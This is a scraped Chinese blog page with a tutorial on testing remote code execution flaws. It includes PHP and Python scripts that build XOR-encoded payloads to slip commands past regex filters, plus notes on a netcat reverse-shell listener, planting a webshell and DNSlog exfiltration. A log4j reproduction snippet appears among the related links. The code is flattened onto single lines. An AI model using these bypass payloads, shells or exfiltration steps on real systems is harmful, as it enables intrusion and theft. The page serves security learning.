当前位置: 首页 > news >正文

黑盒RCE测试 异或测试

news 2026/4/10 22:04:31

前言

了解了漏洞的原理之后就需要知道  他在哪能出现  并且被利用  这个还是很重要的

异或测试

使用异或(XOR)运算进行加密解密的原理_异或加密-CSDN博客

异或测试是在 白盒内执行的 一个例题看一下

输入什么都是会报错

这种情况就需要使用  异或计算或者或运算进行绕过 脚本:

<?php
$myfile = fopen("res.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {for ($j=0; $j <256 ; $j++) {if($i<16){$hex_i='0'.dechex($i);}else{$hex_i=dechex($i);}if($j<16){$hex_j='0'.dechex($j);}else{$hex_j=dechex($j);}$preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){echo "";}else{$a='%'.$hex_i;$b='%'.$hex_j;$c=(urldecode($a)^urldecode($b));if (ord($c)>=32&ord($c)<=126) {$contents=$contents.$c." ".$a." ".$b."\n";}}}
}
fwrite($myfile,$contents);
fclose($myfile);

运行之后会生成一个 文件

import requests
import urllib
from sys import *
import osdef action(arg):s1 = ""s2 = ""for i in arg:f = open("res.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:# print(i)s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"^\"" + s2 + "\")"return (output)while True:param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"print(param)

之后运行这个 就会出现询问

把上边这个异或计算的值拿出来直接 放到参数里

就能执行命令了

黑盒测试

RCE的黑盒出现在哪里啊?记住原理用户的输入别当做恶意代码执行   找有输入的地方但是 有输入怎么可能让你调用这个呀    那不就是相关的工具嘛  找一下(一般这类工具都是在沙盒里的)

JSLinux                       

可以查看相关的配置文件   这些配置文件就是它本身的 

弹个shell试一下  构造shell

[~]#棱角 ::Edge.Forum*

本地服务器监听  nc -lvvp 66   不就可以拿到shell了呀  但是一般的这个linux工具给你使用都会给这个命令禁   或者直接把命令文件删除

无回显问题

1、命令执行写的 网站服务器的其他的文本下边

2、带外

演示:    shell_exec 需要输出才能回显数据

1、

写个文件

写个木马 访问连接上去不就又是一个思路了嘛

2、带外

使用DNSlog  

获取ip

数据带外 (因为我只是localhost 是带不出来的 如果想带外就需要自己搭建个本地网站)

相关文章:

黑盒RCE测试 异或测试

前言 了解了漏洞的原理之后就需要知道 他在哪能出现 并且被利用 这个还是很重要的 异或测试 使用异或&#xff08;XOR&#xff09;运算进行加密解密的原理_异或加密-CSDN博客 异或测试是在 白盒内执行的 一个例题看一下 输入什么都是会报错 这种情况就需要使用 异或计…...

编程日记 2024/12/25 4:01:04

kotlin中泛型中in和out的区别

概念含义 in关键字&#xff08;逆变&#xff09; 在Kotlin泛型中&#xff0c;in关键字主要用于定义逆变&#xff08;Contravariance&#xff09;。它表示一个泛型类型参数可以是指定类型或者它的超类型。简单来说&#xff0c;就是对于类型A和B&#xff0c;如果A是B的子类型&…...

编程日记 2024/12/25 4:00:03

c# iis 解决跨域问题

该错误是一个典型的跨域问题&#xff0c;说明从 http://www.fuc.com 发起的请求被目标服务器&#xff08;https://aip.baidubce.com&#xff09;拒绝&#xff0c;原因是目标服务器未返回正确的 AccessControlAllowOrigin 响应头。 解决方法 1. 了解问题的本质 CORS&#xff08…...

编程日记 2024/12/25 3:57:00

MySQL版本对应的mysql-connector-java版本下载地址

MySQL版本mysql-connector-java版本mysql-connector-java下载地址MySQL安装版下载地址MySQL免安装版下载地址5.1.x5.1.xmysql-connector-java 5.1.xMySQL Installer 5.1.xMySQL Community Server 5.1.x5.5.x5.1.x, 5.5.x mysql-connector-java 5.1.x, mysql-connector-java 5.5…...

编程日记 2024/12/25 3:55:59

【读书笔记】《论语别裁》爱与罪

一、内容摘要 《论语别裁》第01章讨论了孔子关于孝悌的思想&#xff0c;以及其在中国文化中的重要性和复杂性。文中引用了有子的观点&#xff0c;强调孝弟是为人之本。然而&#xff0c;随着历史的发展&#xff0c;孔子的思想也被误解或被用作维护专制统治的工具。通过司马迁的…...

编程日记 2024/12/25 3:50:56

uniApp上传文件踩坑日记

最近在做移动端app&#xff0c;开始接触uniapp。想着直接用PC端的前后端API去做文件上传&#xff0c;但是uniapp的底层把请求拆成了普通请求和文件上传请求&#xff0c;所以不能用一个axios去做所有请求的处理&#xff0c;拆成uni.request和uni.uploadFile去分别处理两种情况。…...

编程日记 2024/12/25 3:49:54

Webhook 是什么?详解其工作原理

在现代技术中&#xff0c;一切都相互连接&#xff0c;每个应用程序通过许多服务的组合和协调实现无缝工作。这种协调是通过 webhooks 实现的。 Webhooks 是基于 HTTP 的回调函数&#xff0c;其中一个服务使用 API 立即通知另一个服务发生的事件。这就是简单的版本。从技术上讲…...

编程日记 2024/12/25 3:45:51

log4j2漏洞复现(CVE-2021-44228)

靶场环境 步骤一&#xff1a;设置出战规则 步骤二&#xff1a;开启靶场 cd vulhub cd log4j cd CVE-2021-44228 docker-compose up -d docker ps 访问端口 靶机开启 步骤三&#xff1a;外带注入 获得dnslog 靶机访问dnslog 得到dnslog的二级域名信息 步骤四&#xff1a;构造…...

编程日记 2024/12/25 3:44:50

tcpdump抓包分析

使用tcpdump进行抓包分析是一个常见的网络诊断和分析任务。以下是如何使用tcpdump进行抓包和分析的一些基本步骤和技巧&#xff1a; 1. 基本抓包 首先&#xff0c;你需要确定要抓取数据包的网络接口。可以使用ifconfig或ip addr命令查看网络接口。然后&#xff0c;使用以下命…...

编程日记 2024/12/25 3:43:49

LearnOpenGL学习(碰撞检测,粒子)

完整代码见&#xff1a;zaizai77/OpenGLTo2DGame: 基于OpenGL制作2D游戏 物体本身的数据来检测碰撞会很复杂&#xff0c;一半使用重叠在物体上的更简单的外形来检测。 AABB - AABB 碰撞 AABB代表的是轴对齐碰撞箱(Axis-aligned Bounding Box)&#xff0c;碰撞箱是指与场景基…...

编程日记 2024/12/25 3:40:45

操作系统(24)提高磁盘I/O速度的途径

前言 操作系统提高磁盘I/O速度的途径多种多样&#xff0c;这些途径旨在减少磁盘访问的延迟和开销&#xff0c;提高数据传输的效率。 一、磁盘高速缓存&#xff08;Disk Cache&#xff09; 磁盘高速缓存是一种在内存中为磁盘数据设置的缓冲区&#xff0c;用于存储磁盘中某些盘块…...

编程日记 2024/12/25 3:39:44

C/C++基础知识复习(45)

1) C 中面向对象编程如何实现数据隐藏&#xff1f; 在 C 中&#xff0c;数据隐藏是通过将类的成员变量和方法的访问权限控制起来实现的。通常&#xff0c;数据隐藏是通过使用 访问控制 机制来实现的&#xff0c;C 提供了三种访问控制修饰符&#xff1a; private: 使成员变量和…...

编程日记 2024/12/25 3:38:42

现代C++锁介绍

文章目录 场景描述&#x1f41e; 初始实现: 非线程安全版本互斥锁: std::mutex使用mutex保护共享资源使用std::lock_guard简化锁的管理 优化读操作: std::shared_mutex多个锁的管理: std::scoped_lock使用std::scoped_lock避免死锁 其他高级锁⏳ 带超时的锁: std::timed_mutex使…...

编程日记 2024/12/25 3:37:41

Squid代理服务器的安装使用

1.简介 Squid代理服务器是一种高效的中间服务器&#xff0c;位于客户端和目标服务器之间&#xff0c;起到了重要的网络中介作用。以下是对Squid代理服务器的详细介绍&#xff1a; 一、功能特点 缓存功能&#xff1a; Squid可以缓存经过它的请求和响应数据。当客户端发起请求时…...

编程日记 2024/12/25 3:36:39

爬虫学习案例8

爬取京东评论信息 采用DrissionPage自动化工具采集&#xff0c;感觉比Selenium工具好&#xff0c;真香。 安装第三方库 pip install DrissionPage pip install pandas pip install pyecharts pip install jieba pip install wordcloud1.安装DrissionPage库 DrissionPage安装…...

编程日记 2024/12/25 3:31:34

深入了解 CouchDB 的 Mango 查询:操作符和限制

CouchDB 是一个基于文档的数据库管理系统,支持 HTTP 协议,拥有强大的同步机制和灵活的数据模型。Mango 查询是 CouchDB 中用于数据检索的现代化查询接口,灵感来自 MongoDB 的查询语法。本文将深入探讨 Mango 查询中的各种操作符和限制,并提供详细的例子和说明,帮助你更好地…...

编程日记 2024/12/25 3:28:31

基于SSM(Spring + Spring MVC + MyBatis)框架搭建一个病人跟踪信息管理系统

基于SSM&#xff08;Spring Spring MVC MyBatis&#xff09;框架搭建一个病人治疗跟踪信息系统是一个相对复杂的项目&#xff0c;涉及到多个模块和功能。以下是一个简要的指导步骤。 1. 环境准备 开发环境&#xff1a;确保安装了Java Development Kit (JDK)&#xff0c;建议…...

编程日记 2024/12/25 3:27:30

U盘文件名变乱码:原因、恢复与预防全解析

一、U盘文件名变乱码现象描述 在日常使用U盘进行数据传输和存储时&#xff0c;我们有时会遇到一个令人头疼的问题&#xff1a;U盘中的文件名突然变成了乱码&#xff0c;无法正常识别或访问。这些乱码文件名可能包含各种奇怪的字符和符号&#xff0c;使得原本有序的文件管理变得…...

编程日记 2024/12/25 3:26:29

EasyGBS国标GB28181公网平台P2P远程访问故障诊断:云端服务端排查指南

随着信息技术的飞速发展&#xff0c;视频监控领域正经历从传统安防向智能化、网络化安防的深刻转变。EasyGBS平台&#xff0c;作为基于国标GB28181协议的视频流媒体平台&#xff0c;为用户提供了强大的视频监控直播功能。然而&#xff0c;在实际应用中&#xff0c;P2P远程访问可…...

编程日记 2024/12/25 3:25:28

一网多平面

“一网多平面”是一种网络架构概念&#xff0c;具体指的是在一张物理网络之上&#xff0c;逻辑划分出“1N”个平面。以下是对“一网多平面”的详细解释&#xff1a; 定义与构成 01一网多平面 指的是在统一的物理网络基础设施上&#xff0c;通过逻辑划分形成多个独立的网络平面…...

编程日记 2024/12/25 3:23:25

华为服务器SP380网卡固件升级保姆级教程(附避坑指南)

华为SP380网卡固件升级全流程实战手册 当数据中心运维团队遇到网络性能瓶颈或安全漏洞时&#xff0c;网卡固件升级往往是最经济高效的解决方案。作为华为服务器搭载的高性能网卡&#xff0c;SP380在企业级环境中承担着关键的网络流量处理任务。本文将深入解析通过Smart Provisi…...

编程新知 2026/4/10 22:02:33

官宣在即!安切洛蒂续约巴西队至2030年,年薪1000万欧元,将带两个世界杯周期

据ESPN巴西版报道&#xff0c;巴西国家队主教练安切洛蒂已与巴西足协达成续约口头协议&#xff0c;新合同将持续至2030年世界杯&#xff0c;年薪维持1000万欧元不变。这意味着&#xff0c;66岁的意大利名帅将带队打完两个世界杯周期——从2026年美加墨世界杯到2030年百年世界杯…...

编程新知 2026/4/10 21:20:24

计算机毕业设计:Python智慧天气数据采集与可视化系统 Django框架 线性回归 数据分析 大数据 机器学习 大模型 气象数据(建议收藏)✅

博主介绍&#xff1a;✌全网粉丝50W,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业项目实战8年之久&#xff0c;选择我们就是选择放心、选择安心毕业✌ > &#x1f345;想要获取完整文章或者源码&#xff0c;或者代做&#xff0c;拉到文章底部即可与…...

编程新知 2026/4/10 21:18:23

学习困难的情绪困扰解决方案是什么?

社交障碍的干预方法与学习效果关係分析 社交障碍不仅影响到学生的日常生活&#xff0c;也对他们的学习效果产生深远影响。有效的社交障碍干预方法可以帮助学生提升与同伴的互动能力&#xff0c;从而增加课堂参与感。通过心理辅导和实地训练&#xff0c;学生能够逐步克服内心的羞…...

编程新知 2026/4/10 19:58:19

调试排错 - 线程Dump分析锌

1、普通的insert into 如果&#xff08;主键/唯一建&#xff09;存在&#xff0c;则会报错 新需求&#xff1a;就算冲突也不报错&#xff0c;用其他处理逻辑 回到顶部 2、基本语法&#xff08;INSERT INTO ... ON CONFLICT (...) DO (UPDATE SET ...)/(NOTHING)&#xff09; 语…...

编程新知 2026/4/10 19:36:56

WebStorm高效开发Vue3+TypeScript项目:配置与实战技巧

1. WebStorm与Vue3TypeScript开发环境搭建 WebStorm作为JetBrains旗下的前端开发利器&#xff0c;对Vue3和TypeScript的支持堪称完美。最新版本甚至内置了Volar语言服务&#xff0c;让类型推断和代码补全更加精准。先说说我的踩坑经历&#xff1a;第一次用WebStorm创建Vue3项目…...

编程新知 2026/4/10 18:30:23

别再乱用HTTP方法了!从RESTful规范看@GetMapping和@PostMapping的最佳实践

RESTful API设计精髓&#xff1a;GetMapping与PostMapping的工程实践 在当今微服务架构盛行的时代&#xff0c;API设计质量直接影响着系统的可维护性和扩展性。许多开发者虽然熟练使用Spring框架的各类注解&#xff0c;却对HTTP协议背后的设计哲学缺乏深入理解。本文将带你从RE…...

编程新知 2026/4/10 17:44:17

1644万,无锡市“一网统管”城市运行管理平台

4月3日&#xff0c;无锡市“一网统管”城市运行管理平台&#xff08;扩续建2025&#xff09;采购公告&#xff0c;项目预算金额&#xff1a;1644.439万元&#xff0c;提交投标文件截止时间&#xff1a;2026-04-29 09:30 &#xff08;北京时间&#xff09;。一、项目信息&#x…...

编程新知 2026/4/10 17:14:37

国产信创库fio破坏主备库以及备份故障处理--惜分飞傧

一、各自优势和对比 这是检索出来的数据&#xff0c;据说是根据第三方评测与企业数据&#xff0c;三款产品在代码生成质量上各有侧重&#xff1a; 产品 语言优势 场景亮点 核心差异 百度 Comate C核心代码质量第一&#xff1b;Python首生成率达92.3% SQL生成准确率提升35%&…...

编程新知 2026/4/10 15:23:16

别再为Matlab和Unity联调发愁了!手把手教你用UDP搞定实时数据通信(附完整C#/M代码)

跨平台实时通信实战&#xff1a;用UDP打通Matlab与Unity的数据通道 在机器人仿真和数字孪生项目中&#xff0c;Matlab强大的算法开发能力与Unity出色的可视化表现常常需要协同工作。但两个平台间的数据交换却让不少开发者头疼——TCP协议虽然可靠&#xff0c;但在实时性要求高的…...

编程新知 2026/4/10 14:41:50